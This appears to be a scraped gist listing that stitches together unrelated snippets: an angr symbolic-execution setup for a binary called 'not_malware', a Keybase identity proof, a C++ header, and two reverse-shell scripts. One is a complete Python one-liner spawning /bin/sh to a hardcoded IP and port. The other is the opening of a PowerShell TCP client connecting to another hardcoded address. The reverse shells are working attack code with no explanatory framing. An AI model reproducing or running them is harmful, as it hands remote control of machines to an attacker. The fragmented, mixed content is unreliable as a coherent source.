
Estevam Arantes Es7evam

import angr

# Load the target; preload_libs takes a list of shared objects to load ahead of the binary's own dependencies
p = angr.Project("./not_malware", preload_libs=['./bypass.so'])
s = p.factory.entry_state()
# entrada = input: a 480-bit symbolic bitvector to be fed to the program through stdin
entrada = s.solver.BVS("input", 480)
s = p.factory.entry_state(stdin=entrada)
# Alternative: a fully initialised state (library constructors run) with argv set
s = p.factory.full_init_state(args=['./not_malware'])

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.133.80.110",4448));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Keybase proof

I hereby claim:

  • I am es7evam on github.
  • I am es7evam (https://keybase.io/es7evam) on keybase.
  • I have a public key ASBKOgACog6MGx94B66Z_O4FcqhwbCr9sIBJUjgVsQcgKgo

To claim this, I am signing this object:

#include <bits/stdc++.h>
using namespace std;
#define mk make_pair
#define pb push_back
#define fi first
#define se second
typedef pair<int, int> ii;
function cleanup {
    if ($client.Connected -eq $true) {$client.Close()}
    if ($process.ExitCode -ne $null) {$process.Close()}
    exit
}
# Setup IPADDR
$address = '167.99.9.30'
# Setup PORT
$port = '6789'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)